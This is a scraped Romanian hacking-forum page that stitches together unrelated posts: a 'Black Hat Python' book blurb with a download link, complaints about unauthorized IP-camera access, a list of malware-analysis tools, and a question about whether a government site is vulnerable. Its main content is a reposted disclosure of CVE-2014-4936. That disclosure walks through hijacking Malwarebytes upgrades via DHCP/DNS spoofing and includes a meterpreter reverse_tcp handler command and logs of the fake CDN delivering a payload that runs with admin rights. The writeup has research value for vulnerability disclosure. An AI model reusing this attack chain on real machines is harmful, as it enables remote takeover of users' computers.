Leaderboard

Black Hat Python, Python Programming for Hackers & Pentesters (Dec 2014) ''Python is the language of choice for hackers and security analysts for creating powerful and effective tools. Ever wonder how they do it? A follow-up to the perennial best-seller Gray Hat Python, Justin Seitz's Black Hat Python explores the darker side of Python's capabilities—writing network sniffers, manipulating packets, infecting virtual machines, creating stealthy trojans, extending the popular web hacking tool Burp Suite, and more. You'll learn how to: Create a trojan command-and-control using Github. Detect sandboxing and automate common malware tasks, like keylogging and screenshots. Escalate Windows privileges with creative process control. Use offensive memory forensics tricks to retrieve password hashes and inject shellcode into a virtual machine. Abuse Windows COM automation to perform a man-in-the-browser attack. Exfiltrate data from a network most sneakily Insider techniques and creative challenges show you how to extend the hacks, and are sure to make Black Hat Python irresistible to anyone interested in offensive security.'' Download: https://www.sendspace.com/file/tggtkv Source

iLikeIT. Primul lucru pe care trebuie sa-l faceti urgent, daca aveti instalata acasa o camera IP de supraveghere Madalin Dumitru, manager la CyberSmartDefence, a intrat neautorizat, totul live la PRO TV, intr-o camera de la un magazin din Georgia! Dupa ce a explicat ca a facut el niste "scriptulete" sa gaseasca foarte multe ip-uri vulnerabile, Madalin a ales cateva IP-uri si a prezentat publicului larg cum a reusit sa sparga sistemul de securitate de la o gradinita, drept pentru care a prezentat si imagini din interiorul gradinitei! Daca tot mai sunt "unii pe forum" ,oare se sesizeaza cineva? Prin incercarea lor de a demonstra cat de "tari" sunt ei, au intrat fara autorizare pe consola de administrare la o camera de luat vederi a unui magazin din Georgia folosind credentialele default. Mai mult, au aratat si imagini din arhiva acelui sistem. Asta da exemplu clar de "ASA NU!" Cum era aia cu "Noi suntem etici!"? Mi-a placut de Buhnici: "Si cam atat, altceva nu puteti sa faceti mare lucru, nu?!"

Calculeaz? determinantul clasic, apoi cred c? o s? ajungi la o expresie simpla, pe care o logaritmezi ?i-l afli pe x. Spune-mi ce î?i d? dup? ce calculezi determinantul.

Nu prea d?m dreptate celor care nu se ?tiu exprima în limba român?, nici nu suntem nazi?ti gramaticali ci pur ?i simplu î?i pierzi seriozitatea ?i credibilitatea ?i nu te ia nimeni în serios dac? nu e?ti în stare s? folose?ti corect cele mai simple cuvinte. Edit: Am ?ters thread-ul în care urlai în gura mare de abuz, probabil dac? citeai regulile de la bun început ?i le respectai nu se ajungea aici.

CVE-2014-4936: Malwarebytes Anti-Malware and Anti-Exploit upgrade hijacking In June of this year I was playing around with Malwarebytes’s products. I blogged about one of their products, Malwarebytes Anti-Malware, before when it had some issues; you can read that blog entry [ here ]. While playing around with Anti-Malware I discovered you could easily hijack the upgrade mechanism. After figuring out the protocol I could push my own upgrades. I reported this to Malwarebytes on July 16th, it got a CVE assigned: CVE-2014-4936. About half a month later, around the time Malwarebytes had released their Anti-Exploit product Beta I started to play around with this one as well. I discovered it was subject to the same upgrade hijacking method. Both vulnerabilities were scaled under one CVE, it was a shared mechanism (and code). Officially the description for this CVE has become: Malwarebytes Anti-Malware in consumer version 2.0.2 and earlier and Malwarebytes Anti-Exploit in consumer version 1.03 and earlier allow attackers to execute arbitrary code by hijacking the underlying network layer or DNS infrastructure between the client PC and the Malwarebytes Content Delivery Network (CDN). Corporate versions are not affected. One thing to note is that consumer versions of MBAM and MBAE are affected by this. Business versions of the products do not use the Malwarebytes CDN for upgrades. This blog entry describes the vulnerability, how it works and how you can perform the attack including a POC. Code for the POC is hosted on my Github repository: [ CVE-2014-4936 POC ] Timeline: Malwarebytes Anti-Malware Vulnerability discovered: June 18th 2014 Vulnerability reported: July 16th 2014 Vulnerability fixed in version 2.0.3 released on October 3rd 2014 [*]Malwarebytes Anti-Exploit Vulnerablity discovered: August 19th 2014 Vulnerability reported: August 21st 2014 Vulnerability fixed in version 1.04.1.1012 released on September 5th 2014 The vulnerability Both Anti-Malware and Anti-Exploit have upgrade capabilities through the form of HTTP transfered installation packages. Both software packages have no or limited upgrade validation implemented thus allowing anyone who can work out the upgrade protocol to inject their own payload. Updates and Upgrades When the software, either MBAM or MBAE, starts it will first resolve the Malwarebytes CDN: 192.168.2.102 -> 8.8.8.8 (DNS) Standard query A data-cdn.mbamupdates.com For MBAM it will start checking versions of the following: Consumer config Consumer news Consumer versioncheck Consumer HTML Signature database Program upgrades If any of the version requests respond with a higher number than the client itself has it will start downloading a partial or full update/upgrade. For the program upgrading it will download an installer for the latest version. We are interested in the program upgrade as we can use this to, with ease, send malicious payloads without having to go into any advanced exploitation techniques. The client will start by sending a version request: In the version request the User-Agent of the client shows the version (red underlined in the top section), the client has version 1.60.1.1000. The server responds by telling the client version 1.75.0.1300 (red underlined in the bottom section) is the latest available. The client will then proceed by downloading this file by making a request to the CDN once more: The installation is downloaded and the installer for the new version starts. The problem here lies with the fact that the MBAM client does not verify the actual installer it downloads. It can be whatever arbitrary Windows PE the server gives back. This is combined with the fact that MBAM starts the new client installer with full administrative privileges. Similar implementation and the same problem occurs for MBAE as well, payloads are unchecked and executed with full administrative privileges with Malwarebytes’s protection uninstalled. This process is the same for MBAE although the request is a little bit different. MBAM makes the following 2 requests for the version check followed by the upgrade download: GET http://data-cdn.mbamupdates.com/v0/program/mbam.check.program HTTP/1.1 GET http://data-cdn.mbamupdates.com/v0/program/data/mbam-setup-<new version>.exe HTTP/1.1 MBAE makes the following requests: GET http://data-cdn.mbamupdates.com/v2/mbae/consumer/version.chk HTTP/1.1 GET http://data-cdn.mbamupdates.com/v2/mbae/consumer/data/mbae-setup-<new version>.exe Hijacking the upgrades, exploiting the vulnerability I have the following setup: 2 VM’s in host only network adapter mode: Windows XP running an old MBAM version 1.60.1.1000 Kali Linux running my MBAM CDN simulation python script To exploit the client and to prove the vulnerability we need to intercept the DNS requests for the data-cdn.mbamupdates.com. We can have a few options: Change the DNS adapter settings to resolve DNS with my Kali system which can do redirection Use the Windows host file to override DNS Grab ettercap in Kali and spoof towards the client to get DNS redirected. To show the POC in a more ‘natural’ environment I chose the 3rd option. I’m going to show the vulnerability by performing a DHCP spoofing attack. There are of course other methods of attacking, you just need to be able to control the DNS of the client. Let’s start: First we setup both clients running side by side, we put the two VM’s in host only adapter mode. On the Windows XP machine we install the old MBAM version, I took the oldest MBAM installer I had, version 1.60.1.1000: On Kali we also have to start the Malwarebytes CDN simulator, you can get this script from the Github repository [ here ]. The simulator doesn’t need any arguments, you can just run it by typing python Malwarebytes-CDN-Simulator-CVE-2014-4936.py: Some older versions of MBAM (1.46 for example) follow an older upgrade pattern, although the vulnerability also exists for these versions the provided Malwarebytes CDN simulator only works for MBAM since version 1.60.1.xxx. Older version will crash during the upgrade. You could adapt the POC to work for this version as well, its a matter of changing the URL’s it looks at. One thing you have to make sure of is that you throw your payload in the working directory of the CDN simulator and name it ‘payload.exe’ in order to be picked up and send to the upgrading clients. For this attack we’ll generate a meterpreter payload, we’re running Kali which has Metasploit installed already. We can quickly generate a PE payload from the commandline, in this example I use the meterpreter payload: msfcli multi/handler payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=4444 E Note: Rapid7 published a post regarding the deprecation of msfpayload. This means in the future this payload has to be generated slightly different. Read more on the change here: [ Good-bye msfpayload and msfencode ] The handler will start and listen for incoming connections: Our reverse handler is now ready to receive incoming connections from our meterpreter payload, we can now start our attack. Next thing we need to do is get DNS requests from the Windows XP machine redirected towards the Kali machine so it can be intercepted. We do this by grabbing Ettercap, in my case I grab Ettercap Graphical so I can visually show the attack in steps here. Lets open up Ettercap and start by setting it in unified sniffing mode, the difference from bridged mode is that in unified mode we just sniff all packets that pass on the interface, in bridged mode it will use two network interfaces and forward traffic from one to the other and perform a mitm attack. In our case we will do a DNS ‘mitm’ attack but we dont need bridged mode. After opening up unified mode the menu will change: Now its time to select our target, fom the Hosts menu open up the host list and then hit Scan for hosts. A list of hosts in the current connected network will appear, in my case there are 2: The Windows XP machine (192.168.56.102) The host running the virtual machines (192.168.56.1) We select the target, the Windows XP machine with IP 192.168.56.102 and hit the ‘Add to Target 1’ button to select it. You can view the targets by clicking the Current Targets button under the Targets menu option to see if the machine was selected. Now we have to enable the DNS spoofing, Ettercap does have a plugin called ‘dns_spoof’ but I choose to use dnslib’s intercept server. Its part of the DNSLib python library. Setting up is a single command: python -m dnslib.intercept -p 53 -a 192.168.56.103 -i '* IN A 192.168.56.103' Here we setup our listener on port 53 and bind to address 192.168.56.103 and intercept any request (* for the wildcard) and respond to it with the 192.168.56.103 IP. This means we will grab any request, you can also specify it a bit better by only responding for data-cdn.mbamupdates.com and *.data-cdn.mbamupdates.com but for ease I chose to intercept everything and route it to the Kali machine. We now can start our attack. Open up the Mitm menu option and click on Dhcp spoofing. We will spoof DHCP towards the Windows XP client so we can force our own DNS server in the DNS server settings. On the DHCP Spoofing popup we leave the IP Pool field empty, enter 255.255.255.0 in the Netmask field and put our own IP (192.168.56.103) in the DNS Server IP field to enforce the Kali host to be the DNS server for the Windows XP machine. After entering the options hit the ‘OK’ button to start the attack. In the status log we can see Ettercap is starting the attack. After we’ve started the DHCP spoofing we need to wait for the DHCP lease (or force it on the client itself) to renew so Ettercap can spoof it. After a bit Ettercap will log the DHCP request and its response to it: DHCP: [08:00:27:2F:56:97] REQUEST 192.168.56.102 DHCP spoofing: fake ACK [08:00:27:2F:56:97] assigned to 192.168.56.102 DHCP: [192.168.56.103] ACK : 192.168.56.102 255.255.255.0 GW 192.168.56.103 DNS 192.168.56.103 On the client we can now check the IPconfig settings to check for our spoofed DNS server: What we have to do now is either wait for the MBAM client on the Windows machine to contact the server for upgrades automatically or enforce it by hitting the Check for Updates button on the Update tab in the MBAM GUI. On the Malwarebytes CDN script terminal we can see the client contacted us and has downloaded the payload: root@kali:~/mbam_upgrade# python Malwarebytes-CDN-Simulator-CVE-2014-4936.py Started Malwarebytes CDN simulator. [+] Attempt for URI: /v1/news/consumer/version.chk 192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/news/consumer/version.chk HTTP/1.1" 200 - [+] Attempt for URI: /v1/custom/consumer/version.chk 192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/custom/consumer/version.chk HTTP/1.1" 200 - [+] Attempt for URI: /v1/database/rules/version.chk 192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/database/rules/version.chk HTTP/1.1" 200 - 192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v0/program/mbam.check.program HTTP/1.1" 200 - [+] MBAM Client program version check: Client version 1.60.1.1000, enforced update version 2.60.1.1000 192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v0/program/data/mbam-setup-2.60.1.1000.exe HTTP/1.1" 200 - [+] MBAM Client payload download. On the Windows machine we see MBAM telling us a new version is available: If we accept and run the upgrade installer we see MBAM dissapear and nothing happens. Now if you check back with the meterpreter handler we see the client has connected back to us: And due to how the upgrade works, the old MBAM install will execute the ‘installer’ with full administrative privileges as you can see by typing getuid: We have successfully injected our payload into the upgrade process of MBAM. We have taken over the Windows XP machine by abusing the vulnerability. The same process can be used to takeover MBAE clients, the only difference is the checkin URLs but the Malwarebytes CDN simulator script already takes care of it, enjoy! 11:00pm | URL: 0x3a - Security Specialist and programmer by trade - CVE-2014-4936: Malwarebytes Anti-Malware and Anti-Exploit upgrade hijacking Sursa: 0x3a - Security Specialist and programmer by trade - CVE-2014-4936: Malwarebytes Anti-Malware and Anti-Exploit upgrade hijacking

titlul nu se refera la limbaje de programare pentru incepatori, se refera la concepte generale despre limbaje de programare explicate ca unui incepator. si you don't fuck ASM, ASM fucks you

Ca o completare a https://rstforums.com/forum/74965-colectie-linkuri-utile.rst am sa vin si eu cu o lista. Malware Auto-Analysis PeStudio MASTIFF Comodo VirusTotal THREATANALYZR VIRSCAN EUREKA XECSCAN MALWAREVIZ XANDORA VICHECK METASCAN Document Analysis tools OFFICE MAL SCANNER OFFVIS CRYPTAM PDF EXAMINER PDF TOOLS PDF X-RAY PDF X-RAY LITE PEEPDF ORIGAMI PDF STREAMDUMPER JavaScript Analysis tools FIREBUG JSUNPACK-N JS BEAUTIFY JS BEAUTIFIER JavaScript Beautifier JS DEOBFUSCATOR RHINO SPIDERMONKEY 24 MALZILLA System & File Monitoring SYSINTERNALS REGSHOT CAPTUREBAT SYSANALYZER PROCESS HACKER PROCDOT Windows & Linux RADIOGRAPHY RUNSCANNER NORIBEN API MONITOR SWF analysis tools SWFTOOLS Windows & Linux SWF INVESTIGATOR OSX & Windows SWF DECOMPILER OSx & Windows SWFRETOOLS FLASM Linux & OSX & Windows FLARE Linux & OSX & Windows XXXSWF PE tools PE INSIDER CFF EXPLORER LORDPE PEVIEW PE EXPLORER CHIMPREC MALCODE ANALYSIS PACK (MAP) ShellCode analysis tools SHELLDETECT LIBEMU SHELLCODE2EXE CONVERTSHELLCODE SHELLCODE (MALWARE-TRACKER) JMP2IT Source & Download Packer analysis & detection RDG PACKER DETECTOR PEiD PACKERID WINDOWS PACKER DETECTOR LANGUAGE 2000 EXESCAN Q-UNPACK Hex editors HEXPLORER 010 EDITOR Trial-Windows & Purchase & Trial-Linux * Trial-OSX BINTEXT HACKMAN HEX EDITOR HXD Network analysis tools WIRESHARK OSX & Windows FAKENET INETSIM NCAT OSX & Windows APT PROTOCOL DECODERS Custom Base64 & Comment crew des & Joy Trojan &Binanen & Mini ASP Trijan FAKE DNS APATE DNS FAKE SMTP HONEYD TCP DUMP FIDDLER ]BURP SUITE NETWORK MINER NGREP NETWITNESS Memory Forensics tools VOLATILITY VOLATILITUX LINUX MEMORY EXTRACTOR (LIME) MEMORYANALYSIS BULK EXTRACTOR MEMORYZE REDLINE Debuggers OLLYDBG Custom & OLLYDBG 2.0 IMMUNITY DEBUGGER WINDBG GDB EDB URL analysis tools Rex Swain's HTTP Viewer URLQUERY UNMASK CONTENT URL VOID URL VOID Mask BRIGHTCLOUD NORTON SAFE WEB VURL SPONDULAS PHISHTANK SOURCE-CODE-VIEWER NETRENDERER DNS & IP lookup tools CYBER-INTELLIGENCE MXTOOLBOX DOMAIN TOOLS ROBTEX NETWOK-TOOLS DOMAIN DOSSIER DOMAIN QUERIES myDNStools ULTRA TOOLS Disassemblers IDA PRO 6.3 Demo & IDA 5.0 HOPPER Fedora & Ubuntu & OSX CAPSTONE PROFILER Linux & OSX & Windows Malware-Analyzer

Am intrebat doar,nu am pus pe nimeni sa il sparga sau ceva de genu,cum au spus multi ca jumatate din site-urile din lume/sisteme/retele etc sunt vulnerabile ma gandeam ca poate ei au ceva mai special si nu sunt vulnerabili,din cate am auzit pe un alt forum ca ei au nu stiu ce chestie care il face sa nu fie vulnerabil..intrebam..asteptam un raspuns cu DA sau NU.. PS : Ma ajuta pentru cultura mea generala...sa am si eu cu ce ma mandrii in tara mea..SRI nu e vulnerabil,Kaspersky este..desi e o diferenta de la cer la pamant si Kaspersky e altceva..

https://www.sri.ro/ - Credeti ca ar putea fii vulnerabili ? Doar intrebam nu vreau sa folosesc sapun lichid de Craciun si sa dau cu clopotul de gratii..

Ok, ca o concluzie: Reckon suge pula! @TheTime ce zici, se poate da T/C?

Che chau7y m@ @yk3@? du~73 dr@ku 1@ $k0@l@. Translate: Ce cau?i m? aici? Du-te dracu la ?coal?.